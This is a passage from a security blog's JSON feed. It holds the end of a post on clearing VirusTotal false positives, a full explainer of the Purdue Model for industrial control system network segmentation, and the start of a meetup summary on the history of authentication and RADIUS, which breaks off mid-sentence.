vendor's side who resolved our queries so fast!!</p>",
            "url": "https://haxnation.github.io/blog/vt-fp",
            "title": "How We Cleared VirusTotal False Positives for Our Domain",
            "summary": "One morning, our domain appeared on VirusTotal with detections from more than nine security vendors. This is the story of how we investigated the issue, reached out to the vendors, and ultimately got the false positives cleared.\n",
            "date_modified": "2026-06-06T08:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "misc",
                "VirusTotal",
                "False-Positives",
                "Antivirus",
                "Domain-Reputation"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/the-purdue-model",
            "content_html": "<p>In this blog, we'll explore the Purdue Model, its different levels, and its role in modern industrial cybersecurity.</p>\n<style>\n.diagram-container {\n  display: flex;\n  justify-content: center;\n  margin: 2rem 0;\n}\n\n.diagram-container figure {\n  text-align: center;\n}\n\n.diagram-img {\n  max-width: 100%;\n  height: auto;\n}\n</style>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction\">Introduction<a href=\"https://haxnation.github.io/blog/the-purdue-model#introduction\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-is-purdue-model\">What is Purdue Model?<a href=\"https://haxnation.github.io/blog/the-purdue-model#what-is-purdue-model\" class=\"hash-link\" aria-label=\"Direct link to What is Purdue Model?\" title=\"Direct link to What is Purdue Model?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">It is a <mark>foundational hierarchical framework for organizing industrial control systems (ICS) and operational technology (OT) environments.</mark></li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"historical-context\">Historical Context<a href=\"https://haxnation.github.io/blog/the-purdue-model#historical-context\" class=\"hash-link\" aria-label=\"Direct link to Historical Context\" title=\"Direct link to Historical Context\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">To understand how Purdue model came into existence, we have to take a look at CIM first, so let's start with CIM first.</li>\n<li class=\"\">Now what is CIM? <strong>CIM stands for Computer Integrated Manufacturing</strong>, <mark>a technique by which discrete manufacturing companies might take advantage of computer technology to reorganize the way in which information was collected, analyzed, and used to streamline their manufacturing plants’ operations.</mark></li>\n<li class=\"\">CIM <em>was made to improve product quality, better responsiveness to customer and market and changes, higher productivity, reduced costs and higher profits, increased flexibility and faster introduction of new products.</em></li>\n<li class=\"\">So basically, in simpler words, <mark>CIM was made for the comprehensive integration of all computer systems across the entire manufacturing enterprise.</mark></li>\n<li class=\"\">But early CIM projects often failed or were under delivered.</li>\n<li class=\"\">Why they failed? Often they were too narrow, ignored huge scale and complexity, paid insufficient attention to human and organizational factors and lack of a master plan.</li>\n<li class=\"\">This is the reason why Purdue Model was developed.</li>\n</ul>\n<blockquote>\n<ul>\n<li class=\"\">Purdue Model is named so because it originated at <strong>Purdue University</strong>.</li>\n<li class=\"\"><strong>Theodore J. Williams</strong>, a professor at Purdue University and Director of the Purdue Laboratory for Applied Industrial Control, led the effort.</li>\n</ul>\n</blockquote>\n<ul>\n<li class=\"\">CIM Reference Model Committee developed the foundational Purdue Reference Model for CIM (published as a book by Instrument Society of America in October 1989).\n<ul>\n<li class=\"\">This is Type 1 Architecture.</li>\n<li class=\"\">Blueprint/Model of the physical organization or structure of an enterprise.</li>\n</ul>\n</li>\n<li class=\"\">Then Industry-Purdue University Consortium for CIM took place, in which 10 companies from the Industry took part; developed the Implementation Procedures Manual to turn the Reference Model into Master Plans.</li>\n<li class=\"\">So that's how Purdue Enterprise Reference Architecture (PERA) came into existence (the modern day Purdue Model), PERA solved the gaps that CIM model had and became foundational.\n<ul>\n<li class=\"\">This is Type 2 Architecture.</li>\n<li class=\"\">Models the steps of the process of developing enterprise integration.</li>\n<li class=\"\">Provides the framework or roadmap for analysis, design, implementation, operation, and disposal.</li>\n</ul>\n</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"but-if-purdue-model-was-made-for-cim-then-how-did-it-evolve-into-icsot-security\">But if Purdue Model was made for CIM then how did it evolve into ICS/OT security?<a href=\"https://haxnation.github.io/blog/the-purdue-model#but-if-purdue-model-was-made-for-cim-then-how-did-it-evolve-into-icsot-security\" class=\"hash-link\" aria-label=\"Direct link to But if Purdue Model was made for CIM then how did it evolve into ICS/OT security?\" title=\"Direct link to But if Purdue Model was made for CIM then how did it evolve into ICS/OT security?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">As we previously discussed, <strong>The Purdue Reference Model for CIM (Type 1)</strong> and <strong>Purdue Enterprise Reference Architecture (PERA) (Type 2)</strong> were created <strong>to solve integration problems in manufacturing</strong>.</li>\n<li class=\"\">It <em>defined hierarchical layers for how information should flow in a Computer Integrated Manufacturing environment.</em></li>\n<li class=\"\">These hierarchical structures turned out to be perfect for security as it provided -\n<ul>\n<li class=\"\">Network segmentation</li>\n<li class=\"\">Defense in depth</li>\n<li class=\"\">Controlled information flows</li>\n<li class=\"\">Security zones and conduits</li>\n<li class=\"\">Placement of industrial DMZs</li>\n</ul>\n</li>\n<li class=\"\">So ultimately what was designed for integration became an excellent reference architecture for segmentation and zoning.</li>\n<li class=\"\">The Purdue Model strongly influenced many ICS security standards such as IEC 62443 (we will cover it in upcoming blogs).</li>\n</ul>\n<p>Ok, enough of beating around the bush, let's get straight into learning the layers of the model.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-purduepera-model\">The Purdue/PERA Model<a href=\"https://haxnation.github.io/blog/the-purdue-model#the-purduepera-model\" class=\"hash-link\" aria-label=\"Direct link to The Purdue/PERA Model\" title=\"Direct link to The Purdue/PERA Model\" translate=\"no\">​</a></h2>\n<p>The Purdue Model divides an industrial environment into multiple hierarchical levels. Each level has its own purpose, systems, and responsibilities.</p>\n<div class=\"diagram-container\">\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/ics-ot-sec-blogs/imgs/purdue-model.jpg\" alt=\"ICS cybersecurity architecture and convergence\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 1.1:</strong> The Purdue/PERA Model\n    </figcaption>\n  </figure>\n</div>\n<blockquote>\n<p><strong>Points to remember -</strong></p>\n<ul>\n<li class=\"\">Lower Levels = Physical Industrial Processes = Critical/Higher Potential Impact = Tough to Reach</li>\n<li class=\"\">Higher Levels = Business Operations = Larger Attack Surface = Easier to reach</li>\n</ul>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-0---the-physical-process\">Layer 0 - The Physical Process<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-0---the-physical-process\" class=\"hash-link\" aria-label=\"Direct link to Layer 0 - The Physical Process\" title=\"Direct link to Layer 0 - The Physical Process\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 0 contains the <strong>physical assets and processes that produce real-world outcomes.</strong></li>\n<li class=\"\">So it includes - sensors, actuators and field devices.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-1---basic-control\">Layer 1 - Basic Control<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-1---basic-control\" class=\"hash-link\" aria-label=\"Direct link to Layer 1 - Basic Control\" title=\"Direct link to Layer 1 - Basic Control\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 1 contains <strong>devices that interact directly with the physical process.</strong></li>\n<li class=\"\">These devices gather information from the environment and perform actions based on instructions.</li>\n<li class=\"\">Common examples include:\n<ul>\n<li class=\"\">Sensors</li>\n<li class=\"\">Actuators</li>\n<li class=\"\">RTUs (Remote Terminal Units)</li>\n<li class=\"\">IEDs (Intelligent Electronic Devices)</li>\n</ul>\n</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-2---area-supervisory-control\">Layer 2 - Area Supervisory Control<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-2---area-supervisory-control\" class=\"hash-link\" aria-label=\"Direct link to Layer 2 - Area Supervisory Control\" title=\"Direct link to Layer 2 - Area Supervisory Control\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 2 deals with all the <strong>aggregation stuff for process monitoring and control, it aggregates the data from the controllers; it includes HMI and SCADA systems.</strong></li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-3---site-operations\">Layer 3 - Site Operations<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-3---site-operations\" class=\"hash-link\" aria-label=\"Direct link to Layer 3 - Site Operations\" title=\"Direct link to Layer 3 - Site Operations\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 3 includes the <strong>systems that we need to provide visibility across multiple controllers and production areas</strong>.</li>\n<li class=\"\">So it consists of Manufacturing Execution Systems (MES) and historians for managing and optimizing production processes.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-35---the-industrial-dmz\">Layer 3.5 - The Industrial DMZ<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-35---the-industrial-dmz\" class=\"hash-link\" aria-label=\"Direct link to Layer 3.5 - The Industrial DMZ\" title=\"Direct link to Layer 3.5 - The Industrial DMZ\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 3.5 <strong>acts as a Demilitarized Zone,</strong> instead of allowing direct communication between enterprise and industrial systems, DMZ acts as a secure buffer as traffic is routed through it.</li>\n<li class=\"\">It consists of firewalls, IDS/IPS, etc.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-4---business-planning-and-logistics\">Layer 4 - Business Planning and Logistics<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-4---business-planning-and-logistics\" class=\"hash-link\" aria-label=\"Direct link to Layer 4 - Business Planning and Logistics\" title=\"Direct link to Layer 4 - Business Planning and Logistics\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 4 is where we enter the IT world from OT, it consists of <strong>applications that are important for business operations</strong> rather than industrial processes.</li>\n<li class=\"\">It includes Email Servers, Corporate DBs, etc.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-5---enterprise-network\">Layer 5 - Enterprise Network<a href=\"https://haxnation.github.io/blog/the-purdue-model#layer-5---enterprise-network\" class=\"hash-link\" aria-label=\"Direct link to Layer 5 - Enterprise Network\" title=\"Direct link to Layer 5 - Enterprise Network\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Layer 5 hosts the corporate services, thus <strong>represents the enterprise environment.</strong></li>\n<li class=\"\">This layer is most exposed to external threats.</li>\n<li class=\"\">Includes directory services, ERP systems, etc.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"summary-table\">Summary Table<a href=\"https://haxnation.github.io/blog/the-purdue-model#summary-table\" class=\"hash-link\" aria-label=\"Direct link to Summary Table\" title=\"Direct link to Summary Table\" translate=\"no\">​</a></h3>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<table><thead><tr><th>Level</th><th>Name</th><th>Primary Systems &amp; Devices</th><th>Security Focus &amp; Controls</th><th>Likelihood of Compromise</th><th>Potential Impact</th></tr></thead><tbody><tr><td>5</td><td>Enterprise Network</td><td>Corporate IT, ERP, email, internet</td><td>Standard IT security, largest attack surface</td><td>Higher</td><td>Moderate to high business impact</td></tr><tr><td>4</td><td>Business Logistics</td><td>Plant-level IT, scheduling, maintenance systems</td><td>IT/OT boundary security</td><td>Higher</td><td>Moderate to high business impact</td></tr><tr><td>3.5</td><td>Industrial DMZ</td><td>Firewalls, proxies, jump servers, data diodes</td><td>Critical buffer zone, controlled data exchange</td><td>Medium</td><td>Critical buffer breach (pivoting risk)</td></tr><tr><td>3</td><td>Operations Management</td><td>MES, historians, engineering workstations</td><td>Highest risk in OT; strict access controls</td><td>Medium</td><td>High operational impact</td></tr><tr><td>2</td><td>Supervisory Control</td><td>SCADA servers, HMIs</td><td>Strong access control, continuous monitoring</td><td>Lower (if properly segmented)</td><td>Very high physical/process impact</td></tr><tr><td>1</td><td>Basic Control</td><td>PLCs, RTUs, DCS controllers, IEDs</td><td>Protocol security, strictly limited access</td><td>Lower (if properly segmented)</td><td>Very high physical/process impact</td></tr><tr><td>0</td><td>Physical Process</td><td>Sensors, actuators, motors, valves, instruments</td><td>Physical security, device hardening</td><td>Lower (if properly segmented)</td><td>Highest physical safety/process impact</td></tr></tbody></table>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-do-we-use-purdue-model-in-icsot-security\">How do we use Purdue Model in ICS/OT Security?<a href=\"https://haxnation.github.io/blog/the-purdue-model#how-do-we-use-purdue-model-in-icsot-security\" class=\"hash-link\" aria-label=\"Direct link to How do we use Purdue Model in ICS/OT Security?\" title=\"Direct link to How do we use Purdue Model in ICS/OT Security?\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"zones-and-conduits\">Zones and Conduits<a href=\"https://haxnation.github.io/blog/the-purdue-model#zones-and-conduits\" class=\"hash-link\" aria-label=\"Direct link to Zones and Conduits\" title=\"Direct link to Zones and Conduits\" translate=\"no\">​</a></h3>\n<p>The Purdue Model’s real power in cybersecurity comes from the concepts of <strong>Zones and Conduits</strong>, which were formalized in IEC 62443.</p>\n<ul>\n<li class=\"\"><strong>Zones:</strong> <mark>Logical groupings of assets that share similar security requirements and risk profiles.</mark> In practice, each Purdue level (or group of levels) often becomes one or more zones.</li>\n<li class=\"\"><strong>Conduits:</strong> <mark>The secure communication channels between zones.</mark> Every conduit must be protected to the level of the highest-risk zone it connects.</li>\n<li class=\"\">This creates clear trust boundaries and enforces defense in depth.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"implementation-in-practice\">Implementation in Practice<a href=\"https://haxnation.github.io/blog/the-purdue-model#implementation-in-practice\" class=\"hash-link\" aria-label=\"Direct link to Implementation in Practice\" title=\"Direct link to Implementation in Practice\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"for-new-enterprises-greenfield\">For New Enterprises (Greenfield)<a href=\"https://haxnation.github.io/blog/the-purdue-model#for-new-enterprises-greenfield\" class=\"hash-link\" aria-label=\"Direct link to For New Enterprises (Greenfield)\" title=\"Direct link to For New Enterprises (Greenfield)\" translate=\"no\">​</a></h4>\n<p>Easiest Scenario as we have an empty ground to play with.</p>\n<ul>\n<li class=\"\">Design the network topology using Purdue levels from the beginning.</li>\n<li class=\"\">Build physical and logical segmentation (dedicated switches, VLANs, or SDN per zone).</li>\n<li class=\"\">Include a Level 3.5 DMZ from day one.</li>\n<li class=\"\">Procure IEC 62443-certified components.</li>\n<li class=\"\">Define conduits and security policies early in the project.</li>\n<li class=\"\">Combine with zero-trust and micro-segmentation for modern flexibility.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"for-existing-systems-brownfield\">For Existing Systems (Brownfield)<a href=\"https://haxnation.github.io/blog/the-purdue-model#for-existing-systems-brownfield\" class=\"hash-link\" aria-label=\"Direct link to For Existing Systems (Brownfield)\" title=\"Direct link to For Existing Systems (Brownfield)\" translate=\"no\">​</a></h4>\n<p>Legacy environments are difficult to deal with, so let's segregate it into phases -</p>\n<ul>\n<li class=\"\">Assessment: Use passive discovery tools (e.g., Nozomi, Claroty, Dragos) to map assets to Purdue levels without disrupting operations.</li>\n<li class=\"\">Gap Analysis: Identify flat networks and dangerous direct IT–OT connections.</li>\n<li class=\"\">Phased Segmentation:\n<ul>\n<li class=\"\">Start at the highest-risk boundary (usually Level 3 ↔ 3.5 or 3.5 ↔ 4).</li>\n<li class=\"\">Deploy industrial firewalls and data diodes.</li>\n<li class=\"\">Use “bump-in-the-wire” solutions for deeper levels during maintenance windows.</li>\n</ul>\n</li>\n</ul>\n<blockquote>\n<p><strong>Compensating Controls for Legacy Systems</strong> <br>\nIn many brownfield environments, some Level 0–2 devices are too old to support modern segmentation or cannot be taken offline. In these cases, compensating controls are used to reduce risk:</p>\n<ul>\n<li class=\"\"><strong>Protocol Gateways:</strong> Act as secure intermediaries that translate protocols while enforcing strict allow/deny rules on commands and data.</li>\n<li class=\"\"><strong>Network Access Control (NAC):</strong> Restricts which devices can join the network and what they can access.</li>\n<li class=\"\"><strong>Unidirectional Gateways (Data Diodes):</strong> Allow data to flow in only one direction.</li>\n</ul>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"benefits-and-remaining-challenges\">Benefits and Remaining Challenges<a href=\"https://haxnation.github.io/blog/the-purdue-model#benefits-and-remaining-challenges\" class=\"hash-link\" aria-label=\"Direct link to Benefits and Remaining Challenges\" title=\"Direct link to Benefits and Remaining Challenges\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-the-purdue-model-solves-well\">What the Purdue Model Solves Well:<a href=\"https://haxnation.github.io/blog/the-purdue-model#what-the-purdue-model-solves-well\" class=\"hash-link\" aria-label=\"Direct link to What the Purdue Model Solves Well:\" title=\"Direct link to What the Purdue Model Solves Well:\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Prevents lateral movement.</li>\n<li class=\"\">Reduces attack surface through controlled data flows</li>\n<li class=\"\">Provides a clear framework for compliance (IEC 62443, NIST SP 800-82, etc.)</li>\n<li class=\"\">Protects legacy systems without full replacement</li>\n<li class=\"\">Improves visibility and incident response</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"ongoing-challenges\">Ongoing Challenges:<a href=\"https://haxnation.github.io/blog/the-purdue-model#ongoing-challenges\" class=\"hash-link\" aria-label=\"Direct link to Ongoing Challenges:\" title=\"Direct link to Ongoing Challenges:\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>IT/OT Convergence &amp; IIoT:</strong> Cloud, remote access, and wireless devices blur traditional levels.</li>\n<li class=\"\"><strong>Legacy Equipment:</strong> Many Level 0–2 devices lack modern security features.</li>\n<li class=\"\"><strong>Cost &amp; Disruption:</strong> Full segmentation can be expensive in brownfield sites.</li>\n<li class=\"\"><strong>Rigidity</strong>: Not every environment fits perfectly, always combine with proper risk assessment.</li>\n</ul>",
            "url": "https://haxnation.github.io/blog/the-purdue-model",
            "title": "The Purdue Model",
            "summary": "The Purdue Model is a foundational architecture used to organize Industrial Control Systems (ICS) and Operational Technology (OT) environments into distinct levels. By separating industrial processes, control systems, and business networks, it helps organizations improve visibility, security, and network segmentation.\n",
            "date_modified": "2026-06-05T08:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "ICS",
                "OT",
                "purdue",
                "SCADA",
                "DCS",
                "industrial-security",
                "critical-infrastructure"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary",
            "content_html": "<p>This blog is a summary of what was taught at HTB Meetup Mumbai #16 held on 30th May 2026.</p>\n<style>\n.diagram-container { margin: 1.5rem auto; max-width: 820px; text-align: center; }\n.diagram-caption { font-size: 0.95rem; color: #3a3a3a; margin-top: 0.5rem; }\n.diagram-img { width: 100%; max-width: 780px; border-radius: 8px; box-shadow: 0 12px 28px rgba(0,0,0,0.06); display: inline-block; }\n.diagram-img.small-diagram { max-width: 350px; }\n.diagram-svg { width: 100%; max-width: 780px; height: auto; display: inline-block; transition: transform 0.25s ease; }\n.diagram-svg:hover { transform: scale(1.01); }\n.diagram-text { font-family: ui-sans-serif, system-ui, sans-serif; fill: #4c7ece; font-size: 12px; }\n.diagram-title { font-family: ui-sans-serif, system-ui, sans-serif; fill: #4c7ece; font-size: 13px; font-weight: 700; }\n</style>\n<p>So let's dive into it (hey, wait a minute, why do I feel like I am starting to sound like chat gipidy day by day, anyways, let's start)</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"session-1-authentication-for-dummies-by-adhokshaj-mishra\">Session 1: \"Authentication for Dummies\" by Adhokshaj Mishra<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#session-1-authentication-for-dummies-by-adhokshaj-mishra\" class=\"hash-link\" aria-label=\"Direct link to Session 1: &quot;Authentication for Dummies&quot; by Adhokshaj Mishra\" title=\"Direct link to Session 1: &quot;Authentication for Dummies&quot; by Adhokshaj Mishra\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-is-authentication\">What is authentication?<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#what-is-authentication\" class=\"hash-link\" aria-label=\"Direct link to What is authentication?\" title=\"Direct link to What is authentication?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><mark>Process of verifying the identity of user, device or service before granting access to resources.</mark></li>\n<li class=\"\"><em><strong>Authentication</strong></em> = <em>\"Who you are?\"</em>, whereas <em><strong>Authorization</strong></em> = <em>\"What you can do?\"</em></li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-authentication-used-to-take-place-in-earlier-days-of-computing\">How authentication used to take place in earlier days of computing?<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#how-authentication-used-to-take-place-in-earlier-days-of-computing\" class=\"hash-link\" aria-label=\"Direct link to How authentication used to take place in earlier days of computing?\" title=\"Direct link to How authentication used to take place in earlier days of computing?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">In the 1960s, systems were large, expensive mainframes or there were time sharing machines.</li>\n<li class=\"\">Fernando Corbató (often called \"Corby\") at MIT introduced passwords as part of the Compatible Time-Sharing System (CTSS) around 1961.</li>\n</ul>\n<blockquote>\n<p><mark>CTSS was one of the first time-sharing operating systems, allowing multiple users to share a single mainframe (IBM 7090/7094) with private files.</mark></p>\n</blockquote>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img small-diagram img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/htb-meetup/imgs/single_comp_auth.png\" alt=\"Single computer authentication history\">\n<figcaption class=\"diagram-caption\"><strong>Fig:</strong> Early authentication was tied to single, shared mainframe access before central identity systems existed.</figcaption>\n</figure>\n</div>\n<ul>\n<li class=\"\">Passwords were initially stored in plaintext (a simple file in the filesystem), which was rudimentary by design.</li>\n<li class=\"\">Robert Morris later introduced one-way hashing in 1974 to improve storage security.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-authentication-will-work-if-we-scale-the-above-plan-to-multiple-computers\">How authentication will work if we scale the above plan to multiple computers?<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#how-authentication-will-work-if-we-scale-the-above-plan-to-multiple-computers\" class=\"hash-link\" aria-label=\"Direct link to How authentication will work if we scale the above plan to multiple computers?\" title=\"Direct link to How authentication will work if we scale the above plan to multiple computers?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">The above plan would be a nightmare for multiple computers as\n<ol>\n<li class=\"\">We have to manually copy paste credentials everywhere, so changes/updates on one system will require updates on every system,</li>\n<li class=\"\">Policies will be inconsistent, it would be hard to audit/trace that whether provision of credentials took place on all systems or not.</li>\n</ol>\n</li>\n<li class=\"\">To solve this lets add configuration management.</li>\n</ul>\n<blockquote>\n<p>What is <strong>configuration management</strong>?\n<mark>In context of authentication and user provisioning, configuration management means managing the settings and rules that control how users are created, updated, assigned permissions, and removed across systems.</mark></p>\n</blockquote>\n<ul>\n<li class=\"\">So configuration management will centralize user provisioning.</li>\n<li class=\"\">But what if some of our nodes are not in network, how would you re-provision them, this is the problem with <em>push model</em>, if there are network outages, partial failures, or offline nodes it leads to inconsistency in network.</li>\n<li class=\"\">At that time bandwidth was also costly, we had links operating at Kbps, we cannot just make frequent pushes, as it consume the entire bandwidth and hence would be very costly.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img small-diagram img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/htb-meetup/imgs/config_manager_multi_comp_auth.png\" alt=\"Configuration management and multi-node authentication\">\n<figcaption class=\"diagram-caption\"><strong>Fig:</strong> Central configuration management reduced repeated credential pushes and kept authentication policies consistent.</figcaption>\n</figure>\n</div>\n<ul>\n<li class=\"\">Lets do a small trick to save bandwidth, we will use the inverted <em>pull model</em>,</li>\n<li class=\"\">What is it? In place of central config manager periodically user provisioning, we will make the nodes periodically poll a central config manager.</li>\n<li class=\"\">What will be the policy to do this? (as we again have to save bandwidth, we can't just poll the manager as it would choke up our links) Check if creds are stored locally, if not, poll the manager.</li>\n<li class=\"\">Then how would updates in creds (like change in password) be managed? Do polling at night from all nodes at night or during offline hours, will help in keeping the channel clear during working hours, while also updating creds on all the nodes.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"authentication-on-managed-routers\">Authentication on Managed Routers<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#authentication-on-managed-routers\" class=\"hash-link\" aria-label=\"Direct link to Authentication on Managed Routers\" title=\"Direct link to Authentication on Managed Routers\" translate=\"no\">​</a></h3>\n<p>Years later, technological advancements led to introduction of more devices into the network.\nLets take and example, we introduce a managed router into the network.</p>\n<blockquote>\n<p><mark>Managed switches/routers: Configurable via CLI, SNMP, web interfaces, or central tools. Unlike \"dumb\" unmanaged devices (plug-and-play), managed ones allow VLANs, QoS, monitoring, port security, and firmware updates.</mark>\nWe can provision these like nodes using config manager</p>\n</blockquote>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img small-diagram img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/htb-meetup/imgs/routerauth.png\" alt=\"Router authentication and credential handling\">\n<figcaption class=\"diagram-caption\"><strong>Fig:</strong> Managed routers need authentication designs that avoid local credential caching.</figcaption>\n</figure>\n</div>\n<ul>\n<li class=\"\">Now how would you authenticate into these devices? How would you provision them?</li>\n<li class=\"\">We can't store creds on router as security concerns grew with figures like <strong>Kevin Mitnick</strong> started to enter the scene. Attackers could compromise routers (firmware implants, backdoors), we don't know whether attacker is sitting into the router or not, resetting router doesn't help as he might have compromised firmware or hardware.</li>\n<li class=\"\">Computers are modifiable, but routers are closed cause we cannot change internal components and software (its blackbox - you have to go to service center to make changes).</li>\n<li class=\"\">Resetting might not help if firmware is tainted.</li>\n<li class=\"\">So what is the solution? Avoid caching creds on devices; query a central authority on every login.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-of-isp-into-the-scene\">Introduction of ISP into the scene<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#introduction-of-isp-into-the-scene\" class=\"hash-link\" aria-label=\"Direct link to Introduction of ISP into the scene\" title=\"Direct link to Introduction of ISP into the scene\" translate=\"no\">​</a></h3>\n<p>Years later, ISP entered the scene. What does it offer to the organisation?</p>\n<ul>\n<li class=\"\">ISP says connect to us we will connect you to the world, now how do you authenticate with ISP? Because ISP needs to do billing and give internet to the authorized users only.</li>\n<li class=\"\">Also previously the entire n/w was ours, now we have two parts -\n<ol>\n<li class=\"\">ISP</li>\n<li class=\"\">and Public n/w,</li>\n</ol>\n</li>\n<li class=\"\">The catch is we do not trust public n/w, but we trust ISP.</li>\n<li class=\"\">And we are assured about security of our n/w.</li>\n<li class=\"\">But we don't know what kind of trash is coming up at us from public n/w to ISP and ultimately would land up in our internal n/w and we definitely don't want that.</li>\n</ul>\n<p>So how do we solve this problem? Let's see...</p>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/htb-meetup/imgs/isp_ras_pubnw.png\" alt=\"ISP, RAS, and public network edge\">\n<figcaption class=\"diagram-caption\"><strong>Fig:</strong> The RAS edge separates the public network from the trusted ISP/internal network in the authentication flow.</figcaption>\n</figure>\n</div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-making-of-radius\">The making of RADIUS<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#the-making-of-radius\" class=\"hash-link\" aria-label=\"Direct link to The making of RADIUS\" title=\"Direct link to The making of RADIUS\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"remote-access-service-ras-and-the-edge\">Remote Access Service (RAS) and the edge<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#remote-access-service-ras-and-the-edge\" class=\"hash-link\" aria-label=\"Direct link to Remote Access Service (RAS) and the edge\" title=\"Direct link to Remote Access Service (RAS) and the edge\" translate=\"no\">​</a></h4>\n<p>Add a <mark>Remote Access Service (RAS) at the edge as the single point of connection between the public network and the ISP's internal network.</mark> The RAS (also called a <em><strong>Network Access Server (NAS)</strong></em>) accepts connection attempts from the untrusted public side and forwards authentication/authorization requests to an <em><strong>Authentication Service (AS)</strong></em> that lives on the ISP/internal side.</p>\n<ul>\n<li class=\"\">\n<p>Why this separation? The RAS is 